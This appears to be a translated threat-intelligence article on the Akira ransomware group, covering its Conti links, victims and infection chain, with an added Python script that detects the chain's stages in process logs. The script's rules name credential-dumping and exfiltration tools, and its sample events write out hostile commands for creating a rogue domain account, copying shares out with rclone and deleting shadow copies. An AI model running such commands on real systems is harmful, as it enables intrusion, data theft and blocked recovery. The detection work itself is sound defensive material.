South Westphalia's IT was attacked by the hacker group "Akira", which has meant that numerous local governments have only been able to work to a limited extent for weeks. The ransomware group encrypted server data and is now demanding a substantial ransom, which has not been paid. Akira, a new ransomware family, only appeared this spring. But who is actually behind the group? Trend Micro analyzes the background, techniques and tactics of this highly targeted and successful group.
“Our analysis shows that the ransomware uses similar routines to Conti, such as obfuscating strings and encrypting files. It also avoids the same file extensions as Conti. The main motivation of Akira operators is apparently financial. The group uses double extortion tactics, stealing victims' important data before encrypting devices and files. Interestingly, those behind the scheme reportedly offer victims the option to either pay for file decryption or data deletion. Ransom demands typically range from $200,000 to more than four million,” said Richard Werner, business consultant at Trend Micro.
Who is actually behind the Akira ransomware group?
Akira is rapidly becoming one of the fastest-growing ransomware families thanks to its dual extortion tactics, Ransomware-as-a-Service (RaaS) distribution model, and unique payment options. According to a report that analyzed blockchain and source code data, the Akira group appears to be linked to the now-defunct Conti ransomware gang. Conti, one of the most notorious ransomware families in recent memory, is believed to be the descendant of another prolific ransomware family, the highly targeted Ryuk ransomware.
As ransomware actors evolve their tactics and create increasingly sophisticated ransomware families, organizations must work to improve their cybersecurity to effectively defend against sophisticated threats.
Background to the APT group
The Akira ransomware emerged in March 2023 and is known to target companies in the United States and Canada. Its Tor leak site features a distinctive retro look that, according to a report from Sophos, is reminiscent of the "green screen" consoles of the 1980s and is navigated by typing specific commands. In terms of code, today's malware is completely different from the Akira ransomware family that was active in 2017, although both encrypt files with the same .akira extension.
As previously mentioned, the Akira operators are associated with Conti actors, which explains the similarities in the code, according to the Arctic Wolf Labs team. However, they also found that after the Conti source code was leaked, various malicious actors used it to create or optimize their own code, making tracing the ransomware families to Conti operators even more difficult.
Analysis shows similarity to Conti Group
Trend Micro's analysis shows that the ransomware uses routines similar to Conti's, such as string obfuscation and file encryption. It also skips the same file extensions as Conti. The main motivation of the Akira operators is apparently financial.
The group uses double extortion tactics, stealing victims' important data before encrypting devices and files. Interestingly, those behind the scheme reportedly offer victims the option to pay either for file decryption or for data deletion. Ransom demands typically range from $200,000 to more than four million.
Recent activities also against Linux computers
In June 2023, just three months after its discovery, Akira expanded its list of targeted systems to include Linux machines. In August, incident responder Aura reported that Akira was targeting Cisco VPN accounts that did not have multi-factor authentication (MFA). In early September, Cisco published a security advisory regarding attacks via the zero-day vulnerability CVE-2023-20269 in two VPN features of its products: Cisco Adaptive Security Appliance (ASA) and Cisco Firepower Threat Defense (FTD) Software.
Cisco reports that malicious actors exploiting CVE-2023-20269 can identify valid credentials that can be abused to establish unauthorized remote access VPN sessions and, for victims running Cisco ASA Software Release 9.16 or earlier, a clientless SSL VPN session.
Recently, SentinelOne released a video analyzing an Akira ransomware variant called Megazord that emerged in August. The variant appears to be a reference to a Power Rangers formation, as it encrypts files with the POWERRANGES file extension. The ransom note instructs victims to contact the ransomware actor via the Tox messenger.
Targeted regions and industries
Because Akira is new and highly targeted, it has not produced as many attacks as other established and widespread ransomware families. Trend Micro™ Smart Protection Network™ telemetry shows that France was the country most affected by Akira, accounting for 53.1 percent of all detections. Most Akira victims do not belong to any specific industry.
Akira's monthly detections show a significant spike in June 2023, with 508 attack attempts. The lowest detection rate was recorded in May, with only three attack attempts in the entire month.
Targeted regions and industries based on the Akira Leak Site
The following is based on data from the Akira leak site, which reveals details about the companies targeted by Akira. This data, a consolidation of Trend Micro's Open Source Intelligence (OSINT) research and leak site investigation, shows that Akira actors compromised 107 companies between April 1 and August 31, 2023. Most of Akira's victims, 85.9 percent of them to be precise, were companies based in North America, followed by eight attacks in Europe.
We found that most victims were small businesses with 1 to 200 employees (59 victims). Medium and large companies follow in second and third place. Interestingly, according to the leak site's data, the most commonly targeted sectors are academia and professional services, closely followed by construction and materials.
Chain of infection and techniques
The ransomware typically gains access to victims' environments using valid credentials. The actors may obtain these credentials from their affiliates or from other attacks. They use third-party tools such as PCHunter, AdFind, PowerTool, Terminator, Advanced IP Scanner, Windows Remote Desktop Protocol (RDP), AnyDesk, Radmin, WinRAR and Cloudflare's tunneling tool.
Initial access: Akira actors are known to use compromised VPN credentials for initial access. They have also been observed attacking vulnerable Cisco VPNs by exploiting CVE-2023-20269, a zero-day vulnerability affecting Cisco ASA and FTD.
Persistence: The actors create a new domain account on the compromised system.
Defense evasion: The perpetrators use PowerTool or a KillAV tool that abuses the Zemana AntiMalware driver to detect AV-related processes.
Discovery: The attackers use tools such as PCHunter, SharpHound and AdFind together with Windows net commands, as well as Advanced IP Scanner and MASSCAN, to collect information about the system and the network.
Credential access: The attackers use Mimikatz, LaZagne, or specific command lines to collect credentials.
Lateral movement and command and control: Windows RDP serves the actors as the tool for lateral movement within the victim network. Stolen information is exfiltrated using the third-party tool RClone and web services. They also use either FileZilla or WinSCP to transfer stolen information via File Transfer Protocol (FTP). Other tools in use include AnyDesk, Radmin, Cloudflare Tunnel, MobaXterm, RustDesk and Ngrok.
Impact: The ransomware encrypts affected systems using a hybrid encryption scheme that combines ChaCha20 and RSA. Additionally, like most modern ransomware binaries, the binary has a feature that hinders system recovery by deleting shadow copies from the affected system. The original article contains a list of the folders that are not encrypted and a summary of the encryption details. There you will also find a list of MITRE tactics and techniques as well as a tabular summary of the other malware, tools and exploits used.
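The infection chain above maps naturally onto endpoint telemetry: each stage leaves a process-creation event that a defender can match against the tools and commands named in the article. The following is an added example, not code from Trend Micro or from the original article. It runs a small rule set over constructed process-creation events (host, user, command line, in the shape of Sysmon Event ID 1 or EDR data) and groups the hits per host, because a single tool on one machine is usually an administrator, while several chain stages on the same host within a short window is the pattern described here. The MITRE ATT&CK technique IDs are standard ones; the sample events, hostnames and user names are invented for the example.

```python
"""Stage-based detection of the Akira post-compromise chain over process-creation events.
Added illustration; rule coverage is limited to tools and commands named in the article."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    stage: str          # stage name as used in the article
    technique: str      # MITRE ATT&CK technique id(s)
    pattern: re.Pattern # matched against the full command line, case-insensitive


RULES = [
    # Persistence: a new domain account created with the built-in net command.
    Rule("Persistence", "T1136.002",
         re.compile(r"\bnet1?(?:\.exe)?\s+user\s+\S+\s+\S+\s+/add\b.*\s/domain\b", re.I)),
    # Defense evasion: PowerTool / Terminator / KillAV-style process killers.
    Rule("Defense evasion", "T1562.001",
         re.compile(r"\b(?:powertool|terminator|killav)\w*(?:\.exe)?\b", re.I)),
    # Discovery: AD enumeration and network scanning tools plus net group/view.
    Rule("Discovery", "T1087 / T1018",
         re.compile(r"\b(?:adfind|sharphound|pchunter|advanced_ip_scanner|masscan)\w*(?:\.exe)?\b"
                    r"|\bnet(?:\.exe)?\s+(?:group|view)\b", re.I)),
    # Credential access: credential dumping tools named in the article.
    Rule("Credential access", "T1003",
         re.compile(r"\b(?:mimikatz|lazagne)\w*(?:\.exe)?\b", re.I)),
    # Lateral movement / C2: RDP client, remote access and tunneling tools.
    Rule("Lateral movement / C2", "T1021.001 / T1219",
         re.compile(r"\b(?:mstsc|anydesk|radmin|rustdesk|mobaxterm|ngrok|cloudflared)\w*(?:\.exe)?\b", re.I)),
    # Exfiltration: RClone to cloud storage, FileZilla/WinSCP over FTP.
    Rule("Exfiltration", "T1567 / T1048",
         re.compile(r"\b(?:rclone|filezilla|winscp)\w*(?:\.exe)?\b", re.I)),
    # Impact: shadow-copy deletion to hinder recovery before encryption.
    Rule("Impact", "T1490",
         re.compile(r"\bvssadmin(?:\.exe)?\s+delete\s+shadows\b|\bwmic(?:\.exe)?\s+shadowcopy\s+delete\b", re.I)),
]

# Constructed sample telemetry: (host, user, command line). Not real incident data.
SAMPLE_EVENTS = [
    ("FS01", "CORP\\svc_backup", r"C:\Windows\System32\net.exe user backupadm Passw0rd-example /add /domain"),
    ("FS01", "CORP\\svc_backup", r"C:\Users\Public\PowerTool64.exe"),
    ("WS12", "CORP\\jdoe", r"C:\Windows\System32\cmd.exe /c dir C:\Users"),
    ("DC01", "CORP\\svc_backup", r"C:\Temp\AdFind.exe -f objectcategory=computer"),
    ("FS01", "CORP\\svc_backup", r"C:\Temp\rclone.exe copy D:\Shares remote:bucket"),
    ("FS01", "NT AUTHORITY\\SYSTEM", r"C:\Windows\System32\vssadmin.exe delete shadows /all /quiet"),
    ("WS12", "CORP\\jdoe", r"C:\Program Files\Mozilla Firefox\firefox.exe"),
]


def detect(events):
    """Return one finding dict per (event, rule) match, preserving event order."""
    findings = []
    for host, user, cmdline in events:
        for rule in RULES:
            if rule.pattern.search(cmdline):
                findings.append({"host": host, "user": user, "stage": rule.stage,
                                 "technique": rule.technique, "cmdline": cmdline})
    return findings


def stages_per_host(findings):
    """Map each host to the sorted list of distinct chain stages observed on it.
    Several stages on one host is the escalation pattern worth paging on."""
    per_host = {}
    for f in findings:
        per_host.setdefault(f["host"], set()).add(f["stage"])
    return {host: sorted(stages) for host, stages in per_host.items()}


if __name__ == "__main__":
    hits = detect(SAMPLE_EVENTS)
    for f in hits:
        print(f"{f['host']:5} {f['stage']:22} {f['technique']:20} {f['cmdline']}")
    for host, stages in stages_per_host(hits).items():
        print(f"{host}: {len(stages)} stage(s) -> {', '.join(stages)}")
```

In the sample, FS01 accumulates four of the seven stages (persistence, defense evasion, exfiltration, impact) while the ordinary workstation WS12 produces no findings at all; in practice the per-host stage count, rather than any single tool match, is what should drive the alert severity, and the regexes should be tightened to the binaries actually whitelisted in the environment to keep administrators' legitimate use of AnyDesk or WinSCP from paging the on-call engineer.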
About Trend Micro
As one of the world's leading providers of IT security, Trend Micro helps create a secure world for digital data exchange. With over 30 years of security expertise, global threat research, and constant innovation, Trend Micro offers protection for businesses, government agencies, and consumers. Thanks to our XGen™ security strategy, our solutions benefit from a cross-generational combination of defense techniques optimized for leading-edge environments. Networked threat information enables better and faster protection. Optimized for cloud workloads, endpoints, email, the IIoT and networks, our connected solutions provide centralized visibility across the entire enterprise for faster threat detection and response.